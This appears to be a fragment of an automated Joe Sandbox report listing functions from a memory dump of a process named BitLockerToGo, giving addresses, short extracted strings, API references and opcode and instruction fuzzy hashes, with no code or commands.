~$A&, xrefs: 004097B8
CD, xrefs: 004097F8
$:'+, xrefs: 004095BD, 00409615, 004096DF

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: $:'+$CD$~$A&
API String ID: 0-547238267
Opcode ID: a903939477f0402d1efb93ddac47f6748215c15b01e6c4a4a4e0894d055a6678
Instruction ID: e4190873dcc5f911504c9a9dd83527ed02ee46cecb51a93d12ed5d01cca33800
Opcode Fuzzy Hash: a903939477f0402d1efb93ddac47f6748215c15b01e6c4a4a4e0894d055a6678
Instruction Fuzzy Hash: 359103B16083408BD714CF65C89166FBBE2EFD1314F18892DE5D58B392DB39850ACB5A

Function 0042CBE3 Relevance: 4.0, Strings: 3, Instructions: 297COMMON

Download Yara Rule

Strings

3, xrefs: 0042CF8E
89, xrefs: 0042D10D
_-\/, xrefs: 0042D0EC

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 3$89$_-\/
API String ID: 0-504714695
Opcode ID: 2afdf7f0a4ec19047de4598cce77a2c51f04e518d2ad7e88a7351e6e72c13270
Instruction ID: fa0e3dbb179fe3be04c9dad15cf93414e1fbfb8c209962a213be1ed45f92b95f
Opcode Fuzzy Hash: 2afdf7f0a4ec19047de4598cce77a2c51f04e518d2ad7e88a7351e6e72c13270
Instruction Fuzzy Hash: 6C912C7134C3D04BD339CB3994A13BFBBD2ABE6304F59896ED0D98B382DA7944068756

Function 0042B738 Relevance: 4.0, Strings: 3, Instructions: 222COMMON

Download Yara Rule

Strings

fG, xrefs: 0042B8D1
), xrefs: 0042B743
pxh~, xrefs: 0042B7A0

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: )$fG$pxh~
API String ID: 0-1348051669
Opcode ID: 10079d67cbf96ecc1c28fdbb896d63402551c9f6f8342cccce1b53eb98156813
Instruction ID: a25b475c766a38413ac254536a50495f94ce246e951d1433cb160c56cba00a1d
Opcode Fuzzy Hash: 10079d67cbf96ecc1c28fdbb896d63402551c9f6f8342cccce1b53eb98156813
Instruction Fuzzy Hash: D861C17060C3D18BD7258F3594A17EBBBE1EF92304F28486DC0DD8B282DB79510A8B56

Function 0042D1C4 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 310COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0042D4C2

Strings

w, xrefs: 0042D4EB

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: FreeLibrary
String ID: w
API String ID: 3664257935-476252946
Opcode ID: c9066039513997db2445060aa8e9b38c66cbaa24a3688fc86eb51563c399794b
Instruction ID: e5cd652fddbadd988d243e243d0aadc4afe38972491594b784693925ed4a9d7c
Opcode Fuzzy Hash: c9066039513997db2445060aa8e9b38c66cbaa24a3688fc86eb51563c399794b
Instruction Fuzzy Hash: 68914A71B4C3918BE3218F28D8917ABBBD29FE2314F284A2DE4D9473C2D6399405C757

Function 00404C70 Relevance: 3.3, Strings: 2, Instructions: 823COMMON

Download Yara Rule

Strings

0, xrefs: 00405608
8, xrefs: 00405600

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 7183dff17d09cae0e3bba125faa560453e847f0d542c46a0eea6880dc11694e4
Instruction ID: 11cfc55acacd9b29be8761dc71c992731ce0d6e7e051458f49424b38c413d9fd
Opcode Fuzzy Hash: 7183dff17d09cae0e3bba125faa560453e847f0d542c46a0eea6880dc11694e4
Instruction Fuzzy Hash: 977214716083409FDB10CF18C884B9BBBE1AF94354F44892EF9989B392D379D949CF96

Function 0042900A Relevance: 3.0, Strings: 2, Instructions: 535COMMON

Download Yara Rule

Strings

\RYP, xrefs: 00429146
#JAb, xrefs: 0042933E

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: #JAb$\RYP
API String ID: 0-2564346008
Opcode ID: d27d4f6f030dc1991d18b299baa12d9e845c6ed743fc35e1176206f84714ff79
Instruction ID: ef7bd2198917cdee013875194f2c53fb0b388723a3ba811d8072f7ec65924c58
Opcode Fuzzy Hash: d27d4f6f030dc1991d18b299baa12d9e845c6ed743fc35e1176206f84714ff79
Instruction Fuzzy Hash: F7025475E04264CFEB14CF68E881BAE77B1AF4A310F5941BDE951A7382D7395D00CB68

Function 004214C0 Relevance: 3.0, Strings: 2, Instructions: 511COMMON

Download Yara Rule

Strings

JK, xrefs: 004214EA
U{, xrefs: 004218A9

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: JK$U{
API String ID: 2994545307-2804647760
Opcode ID: 30a7fb4acf67063eed21c48f58556268d6ae000eb71d3ff63a0b7279d3089a44
Instruction ID: a14205f3f9ddc08b031849de81a62b0b169a4fcc75bf251c8f0ed7efbd537042
Opcode Fuzzy Hash: 30a7fb4acf67063eed21c48f58556268d6ae000eb71d3ff63a0b7279d3089a44
Instruction Fuzzy Hash: DCD16872B083209BD720DF24DC9266BB3E1EFE1314F59853DE8C597391E6389D05879A

Function 00437BA9 Relevance: 2.9, Strings: 2, Instructions: 435COMMON

Download Yara Rule

Strings

., xrefs: 00437CEE
_P, xrefs: 00437E7D

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: .$_P
API String ID: 0-145094978
Opcode ID: f01ac957da31c575a7f29d01c351f92228aa7eac6a35bb5ae4b66a4ba069a67e
Instruction ID: 99d01bb25ab6619c8d93c1b9e320f109d83fc958490068c02a03de64d3271c89
Opcode Fuzzy Hash: f01ac957da31c575a7f29d01c351f92228aa7eac6a35bb5ae4b66a4ba069a67e
Instruction Fuzzy Hash: 55D1F37A218316CBCB288F38EC9126B73E2FF4B351F4A987DD581872A0F37989548755

Function 00425287 Relevance: 2.9, Strings: 2, Instructions: 375COMMON

Download Yara Rule

Strings

KM, xrefs: 0042536B
Y[, xrefs: 00425505

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: KM$Y[
API String ID: 0-3358059348
Opcode ID: 576da5b0a6bb03a314e181509f7a5074a1ff0df0cd005910a60b000e5116add0
Instruction ID: 1ea4a5005bf6dce27b4f4a81d99fe56a43f8250439d3046256d0923e83aace4e
Opcode Fuzzy Hash: 576da5b0a6bb03a314e181509f7a5074a1ff0df0cd005910a60b000e5116add0
Instruction Fuzzy Hash: 0DD1D1B9A00204DFDB14CF58E8C1BAE7BB1FF5A314F6440A9E945AB366D7349812CF58

Function 00404340 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

IEND, xrefs: 00404731
), xrefs: 004043BB

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 5eccf7fb2247dccaf7f5c6303e56ce5900c4245da194c862421a082b29f57e97
Instruction ID: 8c3f099a93efec79c1adac07990f56332db84b1a10d43936a9261fbc6700d289
Opcode Fuzzy Hash: 5eccf7fb2247dccaf7f5c6303e56ce5900c4245da194c862421a082b29f57e97
Instruction Fuzzy Hash: 9FD1AFB15083449FD710CF14D84575BBBE4AF94308F14892EFA98AB3C2D7B9E909CB96

Function 0042577B Relevance: 2.7, Strings: 2, Instructions: 234COMMON

Download Yara Rule

Strings

8C@M, xrefs: 00425937
ErFp, xrefs: 00425930

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 8C@M$ErFp
API String ID: 0-451402731
Opcode ID: 984154e2c1c86e63f50cca45de3305a39a04156c885148b9b70f32f4d2f03d10
Instruction ID: 4c25057d34c157c555b303c13364b876b37b22e89eb309d04bade9487f0fb97e
Opcode Fuzzy Hash: 984154e2c1c86e63f50cca45de3305a39a04156c885148b9b70f32f4d2f03d10
Instruction Fuzzy Hash: D761AD36B00A26CBDB24CA68D8411BFB7A2EF95310B99853FC495D7380E738EC16C795

Function 0042B6E1 Relevance: 2.7, Strings: 2, Instructions: 220COMMON

Download Yara Rule

Strings

fG, xrefs: 0042B8D1
pxh~, xrefs: 0042B7A0

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: fG$pxh~
API String ID: 0-2018652497
Opcode ID: dbd081f94b0594dfe365d34bc537e2cf5afcedd78e177b6caac3b9844118e796
Instruction ID: 3956c6f1c4573dbc7244af6f1c67d7fc06972784f67e9f7b14ac6d9a0432d960
Opcode Fuzzy Hash: dbd081f94b0594dfe365d34bc537e2cf5afcedd78e177b6caac3b9844118e796
Instruction Fuzzy Hash: 2A61D17460C3D18BD3258F3594A17ABBBE1EF92304F68485DD0DD8B782DB7854068B5A

Function 0042324C Relevance: 2.7, Strings: 2, Instructions: 191COMMON

Download Yara Rule

Strings

AC, xrefs: 00423159
EG, xrefs: 00423160

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: AC$EG
API String ID: 0-3049793456
Opcode ID: f6c399d7a864b20804ce29c000a932f1812c79df8e5ec83e64ebd3ec58e1101c
Instruction ID: 0a387aac13765c34d7827aa6450e99c1aa55749698e835e2333bb217478e3f86
Opcode Fuzzy Hash: f6c399d7a864b20804ce29c000a932f1812c79df8e5ec83e64ebd3ec58e1101c
Instruction Fuzzy Hash: CF6134B1E10245AFD700CF79C84279EBBB2FB85310F64822DE550EB384D7399A528BE5

Function 004222B1 Relevance: 2.6, Strings: 2, Instructions: 90COMMON

Download Yara Rule

Strings

U%RV, xrefs: 004222F7
Y%RV, xrefs: 0042234A

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: U%RV$Y%RV
API String ID: 0-3078678817
Opcode ID: 44c287b6a765d45ad14f4e35a36b47b38028d1a77870fc68b35162d1e83e6687
Instruction ID: 9be65e438420ebf15d9cec439849eff6f83a0ef22775a7fcda93cdc09bca5dfb
Opcode Fuzzy Hash: 44c287b6a765d45ad14f4e35a36b47b38028d1a77870fc68b35162d1e83e6687
Instruction Fuzzy Hash: B2212736F40121ABCF2DCA689D5067F32A2BB89314B69C53EC556E7398D6BC4C128758

Function 0041655D Relevance: 2.0, Strings: 1, Instructions: 762COMMON

Download Yara Rule

Strings

ukwh, xrefs: 00416A7A

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: ukwh
API String ID: 2994545307-439397672
Opcode ID: f805110f98b9d8d851302580950993c06ff1bc4161faed8018008cc96d8f365d
Instruction ID: 1c12de679d38134fe518265e9a98c8f0b1fb9366fd14f9cc503cd88489a69803
Opcode Fuzzy Hash: f805110f98b9d8d851302580950993c06ff1bc4161faed8018008cc96d8f365d
Instruction Fuzzy Hash: C61203367087409BD725CF28CC907ABB7A2EBD6354F2A892DD5D5873A1D634CC81CB89

Function 0041E520 Relevance: 1.9, Strings: 1, Instructions: 672COMMON

Download Yara Rule

Strings

A, xrefs: 0041EE91

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-3554254475
Opcode ID: 39f5c21e00a55e3915e4b9fd31267638b99304b98463be7b685efcf24f326845
Instruction ID: a078f73d5c600c03a00412e24e1918291864107f7dd9b3b69028a70f12110b26
Opcode Fuzzy Hash: 39f5c21e00a55e3915e4b9fd31267638b99304b98463be7b685efcf24f326845
Instruction Fuzzy Hash: 6362AEB0609B809ED326CF3C8815797BFE5AB5A314F04495EE0EF87392C7B92501CB66

Function 0043A030 Relevance: 1.9, Strings: 1, Instructions: 656COMMON

Download Yara Rule

Strings

f, xrefs: 0043A22F

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: f
API String ID: 2994545307-1993550816
Opcode ID: 7dd8048da2752b463430b5e789f6db5ed6f61dbbdd9a91fdd994969e8323d22a
Instruction ID: 51ff89207c3efd24be4c2d822e4595371369acb3077355d3c8dd438c2b5c7de3
Opcode Fuzzy Hash: 7dd8048da2752b463430b5e789f6db5ed6f61dbbdd9a91fdd994969e8323d22a
Instruction Fuzzy Hash: 202219366483518FC724CF28C88061BB7E2BBD9314F298A2EE8E5973D1D774DD158B86

Function 0041BB40 Relevance: 1.9, Strings: 1, Instructions: 642COMMON

Download Yara Rule

Strings

rs, xrefs: 0041BD24

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: rs
API String ID: 0-2514233613
Opcode ID: b3bbcbab217922775cc951babac4c357b662e5742cf0d9a51e9c3ae9ebe3f5f9
Instruction ID: c1512ef6809fe7a1353aef45dc14a985851bdc250f5009ae0782be22a9fe2615
Opcode Fuzzy Hash: b3bbcbab217922775cc951babac4c357b662e5742cf0d9a51e9c3ae9ebe3f5f9
Instruction Fuzzy Hash: B41222B1A00219DBCB14CFA9C8926EFBBB1FF55310F18852DE895AB351E3389951CBD4

Function 0042A270 Relevance: 1.6, Strings: 1, Instructions: 396COMMON

Download Yara Rule

Strings

", xrefs: 0042A558

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: fb8ee4b108fe66e09d9a0fa8ce5c2bfb26b6f958e8b5f88b637ea2e6adb885a1
Instruction ID: f2e468da186f8178a6ac94a7e5d921651a2fbc2ec7c595dc77dc1c7e65b19277
Opcode Fuzzy Hash: fb8ee4b108fe66e09d9a0fa8ce5c2bfb26b6f958e8b5f88b637ea2e6adb885a1
Instruction Fuzzy Hash: 66C12472B083205BD724CE24E45076BB7D5AF84314F59892FEC958B382E778DC58879B

Function 00417758 Relevance: 1.6, Strings: 1, Instructions: 339COMMON

Download Yara Rule

Strings

%, xrefs: 00417B04

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: %
API String ID: 0-2567322570
Opcode ID: c497642d0c97c8a80d9b0a0e1490942347ce993fae6c76996be63340e39b249b
Instruction ID: c5c4101f37f34a3ef5ff7b82a457e90c5dc061e4d53faf6e2f47ff963708ff3a
Opcode Fuzzy Hash: c497642d0c97c8a80d9b0a0e1490942347ce993fae6c76996be63340e39b249b
Instruction Fuzzy Hash: D7C1F43161C3419FD725CF28C8907ABB7E1EF8A314F14896EE4D987392D7389A45CB86

Function 00416DA5 Relevance: 1.6, Strings: 1, Instructions: 311COMMON

Download Yara Rule

Strings

x, xrefs: 00417193

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: x
API String ID: 0-2363233923
Opcode ID: ae05c755f3f8139e5b1fd2085b00c92b235250967924c7f401721eabbfb31cb5
Instruction ID: bf75baa751ca7956598d4e4d83c13397cb1c458e6968a206b4a3069e3c3e132d
Opcode Fuzzy Hash: ae05c755f3f8139e5b1fd2085b00c92b235250967924c7f401721eabbfb31cb5
Instruction Fuzzy Hash: 20A146B151C390CBD320CF29C8516ABBBE1BFCA318F054A6EE4D997391D7388A45CB56

Function 00426A52 Relevance: 1.5, Strings: 1, Instructions: 288COMMON

Download Yara Rule

Strings

<1;2, xrefs: 00426A9B

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: <1;2
API String ID: 0-1249224986
Opcode ID: f2b92a0128eefc746187996d5bf3448e911761234de0ddf8f28b502defa0a8aa
Instruction ID: f16a8d9e120f420b767866b804fab403b6ccb678b28afed98fe832dda2cf2216
Opcode Fuzzy Hash: f2b92a0128eefc746187996d5bf3448e911761234de0ddf8f28b502defa0a8aa
Instruction Fuzzy Hash: 3B81F3B6B087658BC718DF6DE85021BB7D2ABC4310F5ACA3DD999CB381DA349C01CB85

Function 00405F20 Relevance: 1.5, Strings: 1, Instructions: 269COMMON

Download Yara Rule

Strings

,, xrefs: 00406089

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 2b9e9f29444e3176d12565fe34bf836f89ce31df880bed15e6e17c90551b1f21
Instruction ID: b96f9674fd5cb8bbfdaaca01b3a5f2f8f7e8062a9791535ea57a40758b88e979
Opcode Fuzzy Hash: 2b9e9f29444e3176d12565fe34bf836f89ce31df880bed15e6e17c90551b1f21
Instruction Fuzzy Hash: D9B148712087859FD325CF18C88065BFBE0AFA9308F444A2DF5D997782D635E918CBA7

Function 0041CAB0 Relevance: 1.5, Strings: 1, Instructions: 266COMMON

Download Yara Rule

Strings

~, xrefs: 0041CB7B

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: fc841a9fb5a1417a1d3331c07ab81403bf63a98ed5632bcc2471fb2eb4fc5b99
Instruction ID: 63c3e65306b94331ea4f39d47900c6c4cc7b22dc5598da8d33731e536439ca4d
Opcode Fuzzy Hash: fc841a9fb5a1417a1d3331c07ab81403bf63a98ed5632bcc2471fb2eb4fc5b99
Instruction Fuzzy Hash: 8B9128329482604FCB25CE288C8139BBBD1AB95324F19C33EE8B99B3D1D6389C45D7C5

Function 00428A95 Relevance: 1.5, Strings: 1, Instructions: 248COMMON

Download Yara Rule

Strings

tv, xrefs: 00428F0D

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: tv
API String ID: 0-3959062006
Opcode ID: 18e66170f4ec47e8e1c5db448f37695daf8a30b48a93a03dc770a11df01a94ac
Instruction ID: 43a411511222c0b1f504c9d0e08e1f68d764baf4068fd79c7ca5a57d9c52dbb7
Opcode Fuzzy Hash: 18e66170f4ec47e8e1c5db448f37695daf8a30b48a93a03dc770a11df01a94ac
Instruction Fuzzy Hash: 3C810172E546248FCB24CFA8EC8135EB7B2FB85314F19812DD859AB785CB749C01CB94

Function 0042F550 Relevance: 1.5, Strings: 1, Instructions: 244COMMON

Download Yara Rule

Strings

6, xrefs: 0042F6C3

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 6
API String ID: 0-498629140
Opcode ID: 6c2f9fc4088933ad9070d81b0d75d48ddf1fbed58dda3fe31abb88614551217a
Instruction ID: 1d220e71a893490da3ebce1c957cd065558cfc9253069fe40d47c184f4d7f330
Opcode Fuzzy Hash: 6c2f9fc4088933ad9070d81b0d75d48ddf1fbed58dda3fe31abb88614551217a
Instruction Fuzzy Hash: 9D710A37759AE047D328893C5C213A67AA34BD2330FAD877EE5F5873E1D56D88068349

Function 0041A430 Relevance: 1.4, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

_, xrefs: 0041A51C

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: a8f4536af9795b3da800aa3cec4c419f2d4bfa161ba62daae47bbba1f9e33d48
Instruction ID: 5540313c953f4fa5603a50f7c40a1cb6860a995fba07026fc7ca9c3db1bd6b03
Opcode Fuzzy Hash: a8f4536af9795b3da800aa3cec4c419f2d4bfa161ba62daae47bbba1f9e33d48
Instruction Fuzzy Hash: 326108166046900ADB2CDF74849233BBEE69F44308F2991FFCA55CF697E5398513874A

Function 00416E70 Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

JpA, xrefs: 00417043

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: JpA
API String ID: 0-2896746996
Opcode ID: de15c6573bb26958078b58711e2181df24c25dd44ebc3f12e8158586849ad628
Instruction ID: 628aecb251d7578d8ceda7dbd1d199ed104b48374d7dfcb6dcb7d586fc436c33
Opcode Fuzzy Hash: de15c6573bb26958078b58711e2181df24c25dd44ebc3f12e8158586849ad628
Instruction Fuzzy Hash: FB51F336508360CFC7258F28D8507ABB3F0FF85318F06893DE869AB291D7349945D796

Function 00422966 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

a,B, xrefs: 00422AFE

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: a,B
API String ID: 0-397882135
Opcode ID: c6c77c2a37431797a5b889b6ddf9573d9a60da64bfb438ecc2f112608d10dcd5
Instruction ID: 4c72702e9e110b51a533508b542ca48b91bf2946ed88cd9773777f0f27739761
Opcode Fuzzy Hash: c6c77c2a37431797a5b889b6ddf9573d9a60da64bfb438ecc2f112608d10dcd5
Instruction Fuzzy Hash: D34124B4911B109FD730EFAA8580026BBF0FF666147509A0DD4DA6FB29D3B6E4428F85

Function 0041ADE9 Relevance: 1.4, Strings: 1, Instructions: 113COMMON

Download Yara Rule

Strings

wabd, xrefs: 0041AE87

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: wabd
API String ID: 0-2209172042
Opcode ID: b256969568f27e7eccf79a6964726f95faab8ec0fbc375f13d21247278f7caff
Instruction ID: 6b17803e26d04ea86ae77970b07e285e4559b2ba8837a05b176f59465b4230cc
Opcode Fuzzy Hash: b256969568f27e7eccf79a6964726f95faab8ec0fbc375f13d21247278f7caff
Instruction Fuzzy Hash: 5D31347250D3904BC3158F3898502ABBBA2AFD3724F18DB6DE5D19B2D2D6358903879B

Function 0043D8E0 Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

SRQP, xrefs: 0043D905

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: SRQP
API String ID: 2994545307-1594865775
Opcode ID: f6ef90930f04d19bed13613990256df59941f110705579771faf026c3645adf4
Instruction ID: 981fe634089efbbf062a6f174215e8c444f39d081bbaeda0c7f7d96a1115eeb0
Opcode Fuzzy Hash: f6ef90930f04d19bed13613990256df59941f110705579771faf026c3645adf4
Instruction Fuzzy Hash: 9A31D775B04300AFE7118B24EC41B7BB7E5EFCA714F246A2DE6C867291C274AC618749

Function 00427223 Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

RnB, xrefs: 00427294

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: RnB
API String ID: 0-4090840409
Opcode ID: 710232c9e352de35f9838718908f9bb31f3ac335a89b904feeda198a8f57df39
Instruction ID: 269c3bef7bed09dbc050cf92707b29f30e3b1e657cc235363ee96ee043105d36
Opcode Fuzzy Hash: 710232c9e352de35f9838718908f9bb31f3ac335a89b904feeda198a8f57df39
Instruction Fuzzy Hash: E2F0627570CA20CBD724CB11E65152FB7E1ABDA714F6556ADE88533701C238EC068BAE

Function 0043C8DB Relevance: .8, Instructions: 752COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a041c66699bcfee76f8b441dde2222c419ef3a3197c243ffa7e4252cb589ed0
Instruction ID: 7ce671204a2e12a862403726f8fbe012c22e73f396916c0db8e34b3421fcd5e9
Opcode Fuzzy Hash: 1a041c66699bcfee76f8b441dde2222c419ef3a3197c243ffa7e4252cb589ed0
Instruction Fuzzy Hash: 1132117AB14211CFCB08CF68D8912AAB7E2FB8A310F1A857DD98597391D734D942CB84

Function 00402F60 Relevance: .7, Instructions: 677COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fea4968edc227532dc495b63afe6c21c008f54c6407be1c8ab2d3c97c7f8b537
Instruction ID: 678728a2dff7932158380da69f65df9a3e4a130c4e4a81699d2f4d3114f18973
Opcode Fuzzy Hash: fea4968edc227532dc495b63afe6c21c008f54c6407be1c8ab2d3c97c7f8b537
Instruction Fuzzy Hash: 925207716083459FC714CF28C0906AABFE1BF89305F18867EF89967391D738DA49CB89

